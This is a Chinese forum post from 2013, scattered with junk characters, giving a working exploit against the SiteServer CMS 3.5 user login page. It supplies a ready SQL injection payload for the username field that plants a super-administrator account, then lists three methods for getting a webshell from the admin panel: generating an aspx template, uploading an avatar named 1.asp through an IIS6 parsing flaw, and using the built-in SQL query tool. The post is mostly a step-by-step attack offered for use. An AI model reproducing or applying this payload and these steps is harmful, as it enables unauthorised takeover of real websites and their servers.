经测试秒杀最新的3.5版
# h- Y$ w9 Q( N# \stieserver官网:www.siteserver.cn* }/ s9 i5 x1 z
EXP:
. J4 y# }. \3 d" S8 [' R直接访问UserCenter/login.aspx
% K+ x$ Z! l+ g6 S9 h用户名处输入:
# d; c1 k; K3 ]8 E# a; I* f4 p4 o' U: o# u7 c# G
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 X) w! ]2 ]; F- g, ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
" X- a. b6 L6 C$ ~. k* A0 H6 {; V3 a之后再访问后台SiteServer/login.aspx用插入的用户登陆
; |& G5 O/ l& _, y后台拿webshell的三种方法:
' R8 a$ b% a- t. l b一、) e% h' Y! `. V
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx4 H" C5 }5 @ `# r
二、: R' Z" N2 c1 X- P; l; x( d- `' T$ _
成员权限-》添加用户-》用户名为:1.asp
1 H' s, r$ Z, D) c8 Mhttp://127.0.0.1/usercenter/; u( @! h5 U5 k7 d) ~' }, B
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell1 W3 q' ?# x+ L
(ps:后台添加用户时不会验证是否含有非法字符)9 @' x/ E2 z9 p8 B* b$ ?
三、
, h7 s( Y( ?. K" V& W( V' J& P# H系统工具-》实用工具-》机器参数查看) X8 q& v0 _7 }2 v0 I
可以看到数据库类型、名称,WEB路径) F( E+ E- U) \) R1 I
系统工具-》数据库工具-》SQL语句查询4 M+ @) ]# s+ v7 C
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
支持
反对